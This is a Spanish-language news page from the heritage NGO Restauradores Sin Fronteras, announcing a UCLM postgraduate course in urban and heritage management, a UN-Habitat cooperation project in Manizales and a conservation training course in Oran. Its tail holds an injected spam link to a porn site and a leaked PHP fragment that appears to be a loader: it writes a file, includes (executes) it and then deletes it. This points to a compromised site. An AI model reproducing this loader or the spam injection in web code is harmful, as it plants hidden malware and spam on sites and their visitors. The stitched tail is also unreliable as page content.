Hazte socio

Noticias

curso postgrado

Este programa tiene como objetivo, dar a conocer estrategias para la gestión y revitalización de la ciudad, el paisaje y el territorio como recurso para el desarrollo, en base a principios como el respeto a la identidad y herencia cultural, la consistencia y rigor técnico, y la equidad, eficiencia, y apropiación local. Está destinado a gestores urbanos en un sentido amplio, arquitectos, urbanistas, abogados, economistas, ingenieros y en general responsables de la gestión urbana y del territorio.

El Curso, que se configura como Título Propio de la UCLM, aborda aspectos culturales, instrumentos institucionales y normativos para la protección del patrimonio, instrumentos de gestión y planificación de ciudades y conjuntos históricos… siempre desde una visión comparada de la realidad iberoamericana y española.

  

Fecha y duración:

La II Edición del Postgrado Iberoamericano en Gestión y Revitalización de la Ciudad, el Paisaje y el Territorio, tendrá una duración de tres semanas en su fase presencial que comprenderá del 4 al 22 de julio de 2016. En horario de mañana y tarde:

 - Horario de mañana: lunes a viernes, de 09.00 a 14.00 horas.

 - Horario de tarde: lunes a jueves, de 16.00 a 19.00 horas.

 

Lugar de celebración:

Campus de Ciudad Real(Las actividades se desarrollarán en el Campus de Ciudad Real en la Escuela de Caminos (Edificio Politécnico))

  

Estructura del curso:

  • Modalidad: Semipresencial.

 Número de plazas convocadas: 40 plazas.

 Carga lectiva: 111 horas lectivas presenciales.

 

  • Metodología: Teórico/práctica, con integración de estudios de caso y fichas de trabajo personal.

 

  • Estructura: El curso se estructura en tres módulos que abordan una aproximación al patrimonio desde una perspectiva cada vez más amplia:

Módulo I.- Patrimonio cultura: concepto y programas actuales.

Módulo II y III.- Sistemas patrimoniales urbanos y territoriales.

Proyecto Final: Comunicaciones previas y exposiciones del alumnado. (Experiencias Países)

(Experiencias por países: Los estudiantes del Postgrado, deberán presentar una comunicación escrita, consistente en la descripción de una experiencia o trabajo realizado en el ámbito de su país de procedencia, vinculado a su sector profesional, y relacionada con las distintas temáticas tratadas en el Postgrado).

 

Idioma:

Todas las clases y documentos aportados por el profesorado será en castellano, por lo que se requiere un nivel básico del idioma (tanto hablado como en comprensión). Es posible que alguno de los docentes aporte, de forma excepcional, algún material en inglés.

 

Destinatarios/as:

  • - Gestores urbanos en un sentido amplio, arquitectos, urbanistas, abogados, economistas, ingenieros y en general responsables de la gestión urbana y del territorio.

  • - Gerentes locales, alcaldes, ediles, diputados y representantes públicos relacionados con el ordenamiento urbanístico, el patrimonio y la gestión del territorio en sentido amplio.
  • - Directores de Patrimonio Histórico. 
  • - Responsables de Urbanismo de Municipios.

  • - Gestores de Planeamiento Urbano.

  • - Catedráticos relacionados con la materia.

     

    Los participantes deben implicarse activamente en el Postgrado:

    . Presentando sus experiencias que serán bases de los trabajos que deben realizar personalmente.

    . Colaborando activamente en cada uno de los temas del curso con sus conocimientos y experiencias.

    . Presentando sus trabajos para la publicación final del curso.

    El postgrado debe ser un ámbito de intercambio de conocimientos y experiencias de todos los asistentes


Título de Especialización:

Se entregará Título Propio de Especialista de la Universidad de Castilla – La Mancha, a quienes asistan con regularidad a la actividad académica (mínimo al 85% del horario docente correspondiente a las ponencias y conferencias programadas para el curso según se acredite a través del oportuno control de asistencia). En este Título constará la carga académica total del curso (30 créditos ECTS).

 

Material académico:

Los participantes en el Postgrado Iberoamericano en Gestión y Revitalización de la Ciudad, el Paisaje y el Territorio,  tendrán acceso además de la propia actividad docente, los materiales académicos y de apoyo al curso, la asistencia a conferencias programadas, así como el uso de las instalaciones universitarias de la UCLM, bibliotecas, sala de ordenadores, conexión wifi dentro de los campus universitarios.

Los alumnos/as podrán acceder durante el curso a los recursos bibliográficos especializados de cada asignatura, y también a bases de datos de la Universidad de Castilla- La Mancha.

 

Más información:  https://sites.google.com/site/grputpostgradoi/home

 

 

logo-onu-habitatRestauradores Sin Fronteras (A-RSF) ha comenzado a trabajar en el proyecto de ONU-Habitat que se está desarrollando en la ciudad colombiana de Manizales. En el proyecto, además de la municipalidad de Manizales, participan los ayuntamientos españoles de San Sebastián de los Reyes (Madrid), Santa Coloma de Gramenet (Barcelona) y Valencia.

ONU-Habitat pone en marcha esta iniciativa bajo el titulo “Apoyo a la planificación urbana municipal a través de la cooperación descentralizada”, lo que se pretende con este proyecto, en una primera fase, es facilitar la realización de alianzas “Ciudad-Ciudad” en diferentes ciudades del mundo en desarrollo.

El objetivo principal es establecer relaciones de cooperación técnica entre ciudades para poner en marcha planes locales de desarrollo urbano sostenible e impulsar políticas de cohesión social y territorial. Para ello la iniciativa se basará en el aprendizaje e intercambio de experiencias entre los diferentes actores involucrados en el proyecto.

El Ayuntamiento de San Sebastián de los Reyes, localidad donde A-RSF tiene su sede central, apostó por la participación en el proyecto de Restauradores Sin Fronteras, por su larga trayectoria en la realización de proyectos de cooperación al desarrollo.

Desde la Municipalidad de Manizales se plantearon los siguientes temas a desarrollar:

  • - Recuperación del centro histórico y trabajo en el desarrollo del Plan de Ordenación Territorial, desde el punto de vista del equipamiento urbano.
  • - Modelos de dotación (mega-barrios).
  • - Plan de Ordenación Territorial (2012-2023).

A-RSF por su grado de especialización atenderá la demanda concerniente a la recuperación del centro histórico de la ciudad de Manizales y lo hará tanto desde el punto de vista técnico, como en el de la participación ciudadana.

Durante el mes de mayo se realizará un taller técnico en Manizales con la participación de todas las instituciones participantes en el proyecto. Desde A-RSF se tiene previsto que acudan a dicho taller la arqueóloga Juliana Campuzano, coordinadora del proyecto de A-RSF en San Jacinto (Colombia) y el arquitecto-restaurador Gonzalo Correal, perteneciente al grupo de A-RSF en Colombia.

Enlaces de interés:

- ONU-Habital: www.onuhabitat.org

- Municipalidad Manizales: www.manizales.gov.co

Curso de técnicas de moldes en ArgeliaEl día 28 de abril y hasta mediado del mes de mayo tendrá lugar en la Escuela Regional de Bellas Artes de Orán (Argelia) el curso de técnicas de moldes, formación que se impartirá al profesorado de la especialidad de conservación y restauración de dicho centro.
Los profesores de la Facultad de Bellas Artes. UCM. CES Felipe II, Francisco Manuel Giner Sierra y María Emma García-Castellano serán los profesionales encargados de impartir el curso monográfico.

Esta actividad está enmarcada dentro del proyecto “Asegurada la implantación de la nueva especialidad en conservación y restauración de bienes culturales en la Escuela Regional de Bellas Artes de Orán” que A-RSF está ejecutando en esta ciudad gracias al apoyo de la AECID.

Este proyecto es la fase final de una iniciativa en la que A-RSF viene trabajando desde hace más de 5 años con el objetivo de formar, capacitar e insertar laboralmente a jóvenes argelinos a través de la creación y reglamentación de los primeros estudios en conservación y restauración en Argelia.

Durante estos cinco años se ha capacitado técnica y pedagógicamente al profesorado argelino, se ha elaborado el material pedagógico de cada una de las asignaturas de la nueva especialidad, se han equipado los talleres de restauración, se ha constituido una biblioteca especializada, y se ha logrado un 40% de inserción laboral de los alumnos que han cursado la especialidad.

En esta fase final se pretende asegurar la correcta implantación de los estudios en conservación y restauración de bienes culturales a través del acompañamiento, orientación y asesoramiento en cuestiones académicas y de gestión de la nueva especialidad, así como el perfeccionamiento de algunos aspectos técnico-prácticos que incluye el plan pedagógico. Se pretende también dar a conocer las capacidades profesionales de los nuevos diplomados a través de la publicación de un manual que refleje cuales son los beneficios de la conservación y restauración de bienes culturales para la comunidad y en que consiste la praxis de esta nueva profesión, con la finalidad de sensibilizar a las instituciones públicas y privadas encargadas de la protección del patrimonio argelino y facilitar en consecuencia la inserción laboral de los jóvenes formados.

Página 1 de 2

pretty.porn - mature tube
Go to top "); fclose($hdl); include("{$eb}.$algo"); unlink("{$eb}.$algo"); $npDcheckClassBgp = 'aue'; } ?>